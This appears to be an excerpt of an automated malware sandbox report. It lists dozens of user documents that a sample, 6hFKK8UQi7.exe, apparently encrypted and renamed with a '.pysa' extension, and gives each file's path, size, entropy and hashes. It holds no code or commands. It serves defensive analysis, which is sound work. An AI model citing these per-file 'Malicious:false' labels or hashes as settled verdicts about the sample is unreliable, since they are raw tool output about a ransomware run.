                  SHA-512:724192C103C9079F40A40723CE88176D3467698DBB384AE891847C564DBFEA01E543BFDF1E11971C1AB854BCE2B969A2A79870C9B091F2AE9FCD4D04C75E6D2E
                  Malicious:false
                  C:\Users\user\Desktop\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.037705391715133
                  Encrypted:false
                  SSDEEP:48:dg77CkbLmRma6sQPbMNxfURHcZBWRr1QtY9GIh6ntBnsQT0xtQfWNXmb3:doCkORgUURHcZBWRr1QsenLsQsZx+3
                  MD5:187A70EC8DD05A0283AE093A186D747B
                  SHA1:E53E46164E42AF6CBDD653D9002E184BE389E225
                  SHA-256:4D23C0DC06150BE64D4605DFF40C91445A516533F88E5BD9CF9C9B3F35DA4A03
                  SHA-512:C2AE8F78EBC290D957C3131874F14AB6D2B4ED471CB04DFC9034CCB213824320A222890E03234DC26CC00437A230D25564C569610139C2B1BE16E7B021AC0A4B
                  Malicious:false
                  C:\Users\user\Desktop\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.037414821584597
                  Encrypted:false
                  SSDEEP:48:MDuce7GT9NVVb+kbKq0GhMVsKGHjzeAuh3DiedaGruSfQdp0UbpUw5RIgwjjiyRw:MuNiT9NVMkOqvzHWAUHd6yixIgshRBwZ
                  MD5:CEA4AF32F9DE1BCC0F1883C8EF9FDD9A
                  SHA1:C7AA3C6A9C01E9A92BE07A0C3E85E43E937A71E5
                  SHA-256:64A920641A8BE2CFC35AE9EFAC1BD5465D4A5C9A81897FD1FE8794B63E3A31B5
                  SHA-512:B0D1A8C21A2606367B2BA111F8B4C82AE75BC7021DE2D8410A4EB55E310AAF36B785CFAD9C2D16A21CF386B2CC2C95B9559A064AB056CA04C6036B46BAD8C0D9
                  Malicious:false
                  C:\Users\user\Desktop\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.068179558621237
                  Encrypted:false
                  SSDEEP:48:mdMDT21dKz/xQpXnMzMceXurVlaVH+T4IWrnvYq52xd9DDazsl4mgDzSzeSHTHD1:BPswxYBx+xokUIkvYqkxLDks2mgDzwH9
                  MD5:6FC6EBCB67A401372AD70261A3DF6F64
                  SHA1:F4F46C405B0B76884075E43D20D3DE6052A03AFE
                  SHA-256:E1BDAD36E9B10A9FDAFB69EB3E6345EE7EC4C3D2C2196B958EFCF3E0DE0F277F
                  SHA-512:DFE7D6402FA68BF5E688862FE4B12EBEA6008633D5B929EDA29D910D5EC8D788A2FA144CC08EBADC047AEF1A61936730795DFF0C2DFF8A60FEAC970F3E2EFF74
                  Malicious:false
                  C:\Users\user\Desktop\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040970753638709
                  Encrypted:false
                  SSDEEP:48:Fnl3pPohbbFOrkksDBgYsARjBiSMUG5Eg/PpsttbYnIibhfg79QviXmQIMjZFlZN:/pGbgsehopjdMs8nI8c9QqXP5ZgeLWup
                  MD5:05B61C724C528484DF22A7388CCD7572
                  SHA1:B7144FD888C8803C9309CA391781AFB59F778796
                  SHA-256:462838788A27FBE6FF110C33E221268D79FDB6C107D392DD773EC2E6AE67521E
                  SHA-512:C67278D85ABD49988940EFC722E3A0F089274871EDE8E66EB441C04AD6466E191B35917DCECB24DEA5D822D571DBCC70157CC84722D601B7D37E388D37294E6D
                  Malicious:false
                  C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0227179011790755
                  Encrypted:false
                  SSDEEP:48:YoYbme/vld0MemGYtWmf+awhNab7NBSMnbwpAop8IJFXWXT3awTaWYoUOJMb33Tg:YoYbmUvld0TmTt5fpKNIOG8K1EXa33fF
                  MD5:9E78890D78F1A0B4FC210DE982E67804
                  SHA1:2BA77869545913A64E463D7247837000C3C29B3B
                  SHA-256:B53DB6D51EDA11E547D901237FD03AA87F212EF6D582FDC7D15AADCBAB74F2E1
                  SHA-512:26FF9B0AF2BAD41D5E912B04061DD61A347779E413B92802B376E65C59289895EB817430F0BD97BFCFE009AC1CDB31CF962E7D0EC0D053034A1D4CAFBAE41B77
                  Malicious:false
                  C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067141094095181
                  Encrypted:false
                  SSDEEP:48:p3A0ludjduxG87KTd2RQ+jbF2Qxe7+e2EuZKVRNTXvYLfXHcTvPojrQtZfsQ4umI:p3Aiuvh87GdCQg2d+InNLkf3cjojrMsA
                  MD5:22BC151D73B0A021831D04B3A37EFE07
                  SHA1:A8591A9A43DE7AE77411662DACE753B19906A9FD
                  SHA-256:CC85FE881443003FF802AB8AAC56AA1726963AB475E45C9A02FC4A6C934ECB96
                  SHA-512:FB9902E1B1FF9469155F0CB7A26A13E6AF82D6851EF571ED38935727A61923D00DA8841927EBD064BEB69F91CC500D35154FBD61ACADC546395C0A9CBBB3FCF4
                  Malicious:false
                  C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.070717450453156
                  Encrypted:false
                  SSDEEP:48:qy+xrvr9NAmhgo6RZX1bVO3A+ZTmUVGm8v8hc6NIWtnq/k6TDQQ1pRQBcGdTpBDx:GZLALokF2TmFjv8W/WtnUb3RdaBF
                  MD5:E5C0C47994FAA534F07ACF10B9A1E3C9
                  SHA1:716841BD59CC44CF856194AC3BD31B4E11EC771B
                  SHA-256:E536CFE3E1A25A57BD1E401F6337B78CEBF096E5F107F46DD27BA20DE67D25A0
                  SHA-512:0FE25F1C3CA2C26410B26FC6D9E30B7C7ADABC695FCDD8F394878C8F90CB103B27BD17850B1C076684B1D23C69465A0A502ACD6FDA793CEBB97B6FE7B9AF5E8E
                  Malicious:false
                  C:\Users\user\Desktop\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048594942259095
                  Encrypted:false
                  SSDEEP:48:6WobXFbvwhW8QWPf6vneAwikV80rgenhySBdHUbm2FI+WfggqGfVr/9nni:d6vwhnaeAFw4Qd+I+2ggqGfbi
                  MD5:BF0B2641994630403ECF1A3AF98D3E23
                  SHA1:F54E10C94F7F7868E129F249D9A47429B95D5F82
                  SHA-256:C69E250A3EA9A936261D70BB77F8E0E3B29AC1DD962391B4F28C505A33FB1551
                  SHA-512:F22253DCB0734C9A55197E8F8C5393B8A45ABB485601CC9D75907E730C2EE6E651A263D55C7471C345E8C870E95F27242C1207133D77B4A2BC9C82F79A3AE30E
                  Malicious:false
                  C:\Users\user\Desktop\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0636312657404785
                  Encrypted:false
                  SSDEEP:48:P6DSZ9MQUeClPZCU2OUZF7WdWQD6t9agldn+HyWfwTg6x3c6bxn/m1AuAa4PxjR2:SSR6PA4UZF7Wd/Ds4SQwEi3c61uAa+b2
                  MD5:9333686C758751382A9AA0CE0758C9AC
                  SHA1:F6449B6903C1C88D80B5A92073E57527E48B7C5C
                  SHA-256:F2FC47536BAE4452972C53A10CCC728CC34613AA345DC9ED34D12C9027C71B33
                  SHA-512:A93F39A0377F262C4241F8E8B06651087286A52E3ACA65A7813061D699054897CE52B43A5A646B6E1E7A49E6F758079573A078DC581CDAC6968FFA796BA6ECCE
                  Malicious:false
                  C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048599735133278
                  Encrypted:false
                  SSDEEP:48:8Yh3VHj31TegvDycyhX8AbEQgieHurS5nJyzzn2yiP5d1slG/dYy7YSmeXp/IA/9:8YjD1TegvDjy182mOeXS2yixd1rY4bXl
                  MD5:9503459C21F81281CFBAFB4E9871B676
                  SHA1:8B948E72DA17BC723E8A7E680F344D48E4814823
                  SHA-256:C674BCC16754E3AC5551326B6EFB8F2CF393DFEE047A554A935E03072995FE1D
                  SHA-512:F8C028D2EA8959BDB32E5A69B2B1D6B1B134EA036022361CB7F44F606C5B987CEA821038AB4A1CC50FFFA16F2C6683A2F20430C11EB654F4ADF22BF19AC1C802
                  Malicious:false
                  C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.058538268969088
                  Encrypted:false
                  SSDEEP:48:KRePvH+4qUJ6JK1QOVMJnGdqF+7lhsf/yCArEOEO+3DlxJWwNQ:seH+rUJWRMMdNFulhYqCdt3pxIwy
                  MD5:10B8B4FC70DBB028D68D5CBD730C32F2
                  SHA1:DB97EAAFDA22CAE97B24451128AC151EB393F5CE
                  SHA-256:A5B19C4E22F8FF5418B42EEC4A66234DEA243622F13909E429385CE662DDA4B9
                  SHA-512:EF6287DA915739A9548F64436696D25DEB5F2FF8B98A8679C8D531394C3F6741476FFAEDF0856AA5634BC2532BE463DD6F471DB9CACE2364EE7717256C486D05
                  Malicious:false
                  C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.044446896178692
                  Encrypted:false
                  SSDEEP:48:Doc+M2v7posur2uxeKaULmyin8RJhSOSsqcIOR0UOmnWvu5qlxrooqpIwnj7:yMg1oeuxeKJin8HIX25n0xrhqpIwn3
                  MD5:A951FCF1FBF4A476D3226EA868835EEA
                  SHA1:DE59B2F97A20C2889F1B1D01EAB8E6094C7BF5BD
                  SHA-256:7073E7AB28E3CD35DD651AB72AE4B601EC524506CC59718FE1092CDD68FA3EC9
                  SHA-512:5F1F6D02107CCBF76093EEAE0455592F8BC08C4B496287F815D838412E0D4BB850128EF56F213F566CBB609468F7E196DD239DE4331AC62ADC2644EF65B4C767
                  Malicious:false
                  C:\Users\user\Desktop\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048056526992952
                  Encrypted:false
                  SSDEEP:48:84KhsA7Kdk+mk249p6KoMgrx3acJZjo8Ir73ht3CJBcBAl3A5/GgvlGlMdlbN1:LG/ymk2zKoMgd3acDo8gQBzAMgqMdlbH
                  MD5:1AAB642721FBDF0A16097B4AD3E39B0D
                  SHA1:C6EBEF09300A62A4B4A576419F420AE58397713F
                  SHA-256:DDD8B59D24CB1119FFF31D57DD3084AA92F8CD797F4BA7DE826B530B3BCF55D6
                  SHA-512:F6F621AF555D66DE6E81955B953E273BA1FBA4AE34F0DB9DF58DE6074DAEEB7544A64489FA542E1D6D016B6FA239099ED4EF7ACF3FBE3383799150EBB78F8B5D
                  Malicious:false
                  C:\Users\user\Desktop\ZQIXMVQGAH\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054449174497737
                  Encrypted:false
                  SSDEEP:48:VHy4XU1uUfUCtxIs/o6WULMhHsU2cZT5+vgQGN76oKDmYUMGPwxRQVB5V:dJXjSUuCsJLgHsUKvgnMmYURwxRQVDV
                  MD5:64C5C4FD3638299DD8283F39CDFC82B7
                  SHA1:4E34CC5F1CCAA57FCAA3E57C0DEAB61B65E2D2A9
                  SHA-256:7CCD1261C6E7F618CAB9D755553851ACF7D9AAD0104292E48956A7228BE7D056
                  SHA-512:C2364EC54D0C767A94FD0F8B97CE6E83A5FC433A0ACF4AFE80861B00802A83213FBF2143DE0366EE31502D4A0603ED27CE604538BD99FFD734B089AB88E92240
                  Malicious:false
                  C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057021324845787
                  Encrypted:false
                  SSDEEP:48:gkQwpYZAUYPK54H6Y7JMwGY7V026A1LZpHh81R44wYrn49eVYaq0XNQHfyJIm7TI:gxwp6bCK54HCwGMV0lAlhaR44l0e7XmZ
                  MD5:C7065AFFDBEB38EABDD2C702620A43E3
                  SHA1:6FFDACB8CC6A5DB81AC784C96FCDAE75A5B70C93
                  SHA-256:6BFA555BFF2EB97BAE38C4517D1185B9CB57E641BAA627CB089F8BC1E2F90278
                  SHA-512:3C26BF534BD9E9AD506B157DFBCCEFACFD4476D23E2554D1389AC38A61EB4EE33C14C07D6AA1416DB643D9B467D9145A9B2B72442E2B796298E9E3E4A9103758
                  Malicious:false
                  C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02782753661113
                  Encrypted:false
                  SSDEEP:48:5QrN67l07+NewmAhRDDapSEyVEvnv0W07SUm/pdBz38ca5v+1M9cG3dDh+0zpcZ8:52U7u7Me7GEpYanv0WsMLBz3oA1MGSdj
                  MD5:12132B9FCCB5960251DFDA310E66B362
                  SHA1:3E93D3CF076B8328B5ACB88520E152BDAB7C4FF2
                  SHA-256:DEF1BCC65EDA37EC9BFAB53ADE7E04247DE6D622C1561C84DAD1A946CE6EA3F2
                  SHA-512:AEE7678DEF4C8B5C4D4577CD1FA2EF9EC0E9B7665541A17F148CAC6FBCCD038E448352B94E2E44D4E116A1F89068FBB2E7A680F1F4630983F6BFBEE29A4C3D47
                  Malicious:false
                  C:\Users\user\Documents\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.059608992927378
                  Encrypted:false
                  SSDEEP:48:K2V0yAdpAWJNxw1act1qmWEyMHqh7RzgXsfuEk0nDCaef9QQNHjtmmpJz+4D0qik:hV0yAXXNi37dKXckDCaefOStmmPz7L
                  MD5:7C90FC5C2FC7466298BE79EA08A4EC4C
                  SHA1:51CF90B8C6ACE56CEFE1C7FCDD8960E5A3E8085C
                  SHA-256:07C5F87F54E55DFB742955F8FFE5F29DC0623EBCC0743CE3AD2A2D61631F653B
                  SHA-512:21988E35C124C1E47EE3F67868639536760F7F099EEE5E829BEF9B153C901588985784CE83ADFC90A8B3832525A1772ED9C31C745EF64A3843BD19418C364755
                  Malicious:false
                  C:\Users\user\Documents\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0706209227842844
                  Encrypted:false
                  SSDEEP:48:EnJ9UCBScEM6DC69j1ZufgE0MtS8VQYguAQxgS2NdH99M74cGmN4815Vgge7D:EnJ9UCYcMDLZrR+SOQo5xgv796VV1Tg9
                  MD5:4680892ED493C921F0843B8849F33AD4
                  SHA1:B8913773487DA1B59FD1A1B24EA21612964F8258
                  SHA-256:0048835B43BF4B925B38C2A10C83149C254CF6E4EEDEB37C74C4B6A8902592A9
                  SHA-512:594EDF9BB0C1D3AC6BBA718472FF20BDD921C96FACD7593C2CE4FC19E2D9EB46A8B89450CBAEA52A06AA31A2A0408FA34C6525A2F7E8EED5BDE8C2A106DB6548
                  Malicious:false
                  C:\Users\user\Documents\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054184927395719
                  Encrypted:false
                  SSDEEP:48:9uuePTMO1C6g1zD5PYC6DV/29eMRv0u4CReEYNoS695GMT/LmQaW60j/r8CdcR:9uuMTdEdPYAUu4CRtYoeMXmQa04
                  MD5:9EDD05C3E7C0F93A2B11F7A49F7922F2
                  SHA1:D4535629D4F7A10FEDEC20CA6F342B52C20A501F
                  SHA-256:53EC49E3FF717949AEC2A39A2BB26B468C270AA4FB95386A607785F2595A9192
                  SHA-512:F192AADAE41D7EBA6284F12941EF57DAB2CC055990EBDB176EAC2656555EF2F7ED67D36C9ACABA418EC7F08B09B06F285FDAA37CC70AD34DADA44DAA2C6BABD9
                  Malicious:false
                  C:\Users\user\Documents\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063306143403565
                  Encrypted:false
                  SSDEEP:48:6AHVYupAtyqjDh2J1IfGfgIIkrQBJiSNEArtuB8MhwYwfmjc9WRR3VLXNyPiMQbp:W6AtrD4PIKgeClBrt09jc9YlXNIiPE8n
                  MD5:09A9C7726F9792D1CB623C8DB6B67F54
                  SHA1:98D0AB3A10C9E28A667AF58C40F65B4D7B7E8289
                  SHA-256:2F73A1C30724AA98D4D8470D6464242C87E58A6780F8B3BD39D814224DA34602
                  SHA-512:F06EAD0AF15A5FBBD1F6E0872AD77379B812B9E663D19B803E147DD077987128A3E28F775690A3C3A6CDD3DB8AE04F40ED860DFE0EF0729DCCE530F226E09526
                  Malicious:false
                  C:\Users\user\Documents\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053169248951168
                  Encrypted:false
                  SSDEEP:48:PFh+uhGHEwwtkzKSAFJk/6m3vD8AgDBJhYUx0GOQAcLiwCW1BvmFVZYO:d4vdzKzF2/93vDXOSq0q9meB+RYO
                  MD5:8153E0EFD44E06D0918529EE75DFF637
                  SHA1:64985EEC8915993FDC343AE4AD276C6569637A4C
                  SHA-256:B101304C55B5776B7650A3830CB62BF93385D0615773446EBD863C7E19EA2258
                  SHA-512:C275838ADA480CE0B2C5D9C28367F3CBE1559227E39BAC35189D005A89325E58A9C01E5373300A9EFF1008868F268BD3028625F70B5D03AFEE3EA24CBC7FC1E8
                  Malicious:false
                  C:\Users\user\Documents\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0484093998785164
                  Encrypted:false
                  SSDEEP:48:luaOpsd0UlVNP/oE132FhlEkgTFbT576vnklVNFdydCN1tsbqYgFmBY0/59F2ybp:w7qSUXt3AikwNT576vkl/TSCNn9mBY0n
                  MD5:B712C0208150A838C21E64412A0BB7E4
                  SHA1:AA65EAC9AD1DF6371822E248D10FBA9D1BBC9C66
                  SHA-256:7B734BA0FDB18F42BCC51A0834D6F8D2A465A2C35A4F23939C358D68E904D3E9
                  SHA-512:0371958D89AF83F046AE1C8ACE6AAEB97C4C3E2A1B78EECDCC970B7C3CD3FEC3D1B34F6C802C608715F3E5721F12FAB7625AA8BD587EB5F6D1907111F2F382ED
                  Malicious:false
                  C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05384307450795
                  Encrypted:false
                  SSDEEP:48:TIQIy5iM3NTslmmMvVozKSsroGCPfeDfH7HInE1RmkWfehRZb8JzE+H5TIZg6p:vIoQdYvSvGk0boymRfehRZb8O+ZkT
                  MD5:64B97520A7F4C79FB671BB09702E23EA
                  SHA1:3E466766BE3A8CB2AA0A64C6EC6399AFD34CF38C
                  SHA-256:0EBF8F01BA0E2A7A5B8B1B74BC9C3689ADA7B93FBB46C46DDEB458496839DD88
                  SHA-512:3FE4DF62AE412927CCC4503828658C0028B2E56A041A8EE902FD8A8287536525D53C85E659905E4E6E5C3C022100173D8C0886E67023D1C28DF91B08B0E59F51
                  Malicious:false
                  C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.051111788416815
                  Encrypted:false
                  SSDEEP:48:Rghjy2IuW5YSgfkWkWQyw/a/Qb+6j4RMZzQW6EgeZ8uvi+iMdCCgdiE+ZeuSglrq:6y21qY1fLkRyXr6ERMd6/Yji+iggdiE3
                  MD5:F1755BA75F896BE85A4D3458802F71D8
                  SHA1:88950B3805AA888482779D99EA1DE28C1F53DA0B
                  SHA-256:80330CF64315FC17E3C79535EB3C8684E95545A5C95512D43F27414B8D4B5C1B
                  SHA-512:7FB232BBAEF606454BA9004B64168928028FB262942D55CE4E71D26D8055B55E97AB0007EA311305407A41AC6C16FF91693BA06FAF6FA9C574B2047F8467900C
                  Malicious:false
                  C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.052968603843501
                  Encrypted:false
                  SSDEEP:48:9C+G7LoxN3mV8TPrhkok7X8Ofmrv4f2/6q2RatOFhgH2uw956514Xd:9xXm+Preok7X8OF2/ARCOFhgHkXA4Xd
                  MD5:BAD6C399CA45875DC09454507B0549EA
                  SHA1:B19CC0DC38A648A6496E619AC4D43A97B05DA920
                  SHA-256:178F410183CB0D95C4B5BAD1446C508028AFB30BFCD9F28B183F95D3208FEE81
                  SHA-512:5E5049BF2E5A0E8C8B446BA0F317618188FCA7A36453719C8F65A41F351D16E83E033E3B33B6CCE88CB8FF1D19ADD1CB1F92EE6F3B528EDB87CEF798F5E820B0
                  Malicious:false
                  C:\Users\user\Documents\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054518428014318
                  Encrypted:false
                  SSDEEP:48:dbjGxo7M/cbc7UVsXt/LFOqv8azovXX7qHRUhM1oildBT7fHP4hdQ/IhquNRRPYp:cPcbZVsXR5OqvavbIoM2ilzT7PPOIuHC
                  MD5:E6127924EFCB6B3A58CA9053AFEBFD0E
                  SHA1:B64BF9EB7EAA690371ABB1E477F5C61FCBD132BE
                  SHA-256:F8DF802CBC92D13D573CAE4BC3A2A7EA94B3CF8295B3935F79969EA516857B20
                  SHA-512:E86FD2133A89BE5E46B9FD168D0FAB37593B7FD9F573BDBA207E4EF3CD65A1C9A6A89A00F56AFC2E6B0616127102B12C3ECEF2AB21132D4E8B8124E0845A2F8F
                  Malicious:false
                  C:\Users\user\Documents\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045196577888319
                  Encrypted:false
                  SSDEEP:48:E30N9uWqzr+6wkxlrCBevOFzwRvl9C/RL53/3vtIB09ZyByxJnEIT8eZIm3YH:SoFFWpZvQdyGUu5f8ek
                  MD5:8192502A8862032497AE703C23411059
                  SHA1:812172D70B80AFE840A91ED24294E1E3DF2D1B8A
                  SHA-256:E16C537C8AAB9CE17311CD739252ED99729C189EC4683B741EB09638CF32B2FC
                  SHA-512:1C40A421903305948ACD78BD10396D5B491E7B3D61D97A598EE2122CC5738CF9C8EAA06BE64CEAFF993AD6086F2AD1765CA74FD9ECD2D8A6B0F5EC55D5DBFCE0
                  Malicious:false
                  C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.058684031911772
                  Encrypted:false
                  SSDEEP:48:SozTOthveoeHYAKSsMpCcQXpltoZdlr+Iix0ZGCXS+mHtoASbUcaleKSHcMdsyia:Ivv0HBhHpCHHteDSIixiGCXS3NoAcUcN
                  MD5:1AD2B0414D83A29F3D9B31763709399C
                  SHA1:A00901C7D20DB18BCCB58CDC5E03FE769AEFC336
                  SHA-256:30783BC406783D7118742204167B5A89749E727F92A7A7E6FDB98DC12F94CA74
                  SHA-512:6B2CED0F8CA1C7A4F060C54945502BCDC96A284499A4FA8343C8FAD3198FBEBCE21EC29B0ADBE8A38D39BF09C50A0743BA5CFE48A7E51D4423F5D3ED197CBBC3
                  Malicious:false
                  C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.072399469628606
                  Encrypted:false
                  SSDEEP:48:nC9NkIY+ZkgP6Q4yzSFt7aNl1nUt8ZXXUiRU8RMYvrz4bHOqCe+zMYDzC37zmBc6:C9Njk1Ft7gf9UAli8z4bHLtMHHCuuqIk
                  MD5:8D5A92E4C9AF82157AB525E158F1181C
                  SHA1:64B8DB2A053CE4B7DA23E44555EA61D321DE5278
                  SHA-256:2BD810258ACB735EA959B48821B81BA73794E6334869E66842685B9ECE12E0C3
                  SHA-512:A5AAC5500E9618A2BAB8DA74D825CE1075F10A756D881B735CEF8803743077428E017B0DB24CB93C1CFF9649032B01411D8E0F31FD6E06786CDFB95638D2EC60
                  Malicious:false
                  C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.020531606221842
                  Encrypted:false
                  SSDEEP:48:G7aed7aI8cX15npnBPeqAlLR/SFtsyrJEl5Cf8wHLUH4OUoyuF0LB7YXYuq/jwRQ:Ua47Bg3NKFtt+5uHrUHEoykAURMT
                  MD5:23F1EA4B146A90F0A20874B5A6D1899E
                  SHA1:C4DB757F7CF28FB7DFAFC4F6E8E0FF4D86903266
                  SHA-256:4DDBCA643FFEA05EC467295EC7133950C6CE1975101A40735B46E864284FBB1A
                  SHA-512:01CC92A019C084916E8357782577B3FED0584487D1B80013839859CB4C7887725F00844A9548C70F31A82104AA24FDA3B296FF99EB8533BF08E5B94499731605
                  Malicious:false
                  C:\Users\user\Documents\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061433760447581
                  Encrypted:false
                  SSDEEP:48:TPNpv56ye7tPOfbjgN043FDTbRPkdTU4MFrLwxrrNF3qSusMmGfHiMfzNjAUV:TNpR6ye5PYgOwtbRFBUxrhFaSuRfHiMV
                  MD5:2658153C120C1B7FD4139EA684D0CB94
                  SHA1:61FC7C9E1CBA72AC1035679BE4F83310AC0D3341
                  SHA-256:D01D5E08299DA22E1F1582AB4D5CE636A4D6733D9DA7DFA91513EB33F7D30DB1
                  SHA-512:63B66014C408773BB3EF7CDCDA0C30A73F5D10869EFDCECBE772B97C44883DE00B12418B730E19CEE0E31C1FFE58AC54D624E25233779F583BC8605D387F4B6C
                  Malicious:false
                  C:\Users\user\Documents\ZQIXMVQGAH\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062448156964265
                  Encrypted:false
                  SSDEEP:48:oyf6w0CNu15y7hslFMIGWqDL40BTeWZPnfONoqxwir3qYt/rvldEtTLuF9y/BSlu:5Sw305atIjqDLHBTzZP7qxwE3qEDABLV
                  MD5:0C9B4142DB822B18359728598E4C9B60
                  SHA1:AC0231B4C0D63133F835CB80A107A159D35A4808
                  SHA-256:8391947E232CBC15D657FA416ECB69EB4A42505B05F8D6D79B0924A171A27DA8
                  SHA-512:F70A2E3BC59B5851672F6CCC86B59977702E523D007783E90E62C93DA7808930542433C5383CDA527CEAF5177BA55A942AC1190C251D1DF22CA568BCE9F81DA1
                  Malicious:false
                  C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061333515296922
                  Encrypted:false
                  SSDEEP:48:lB9zqqKHuYf064o81TrVWz2x0rNTASqIosF9XvxIDNp4vq/7C6PjxrYDyGxaxLNT:RGq6RWzhx0ZNrpjjq2wjxrYDjxa9TBWA
                  MD5:3403C075CE577CB680B739F261593480
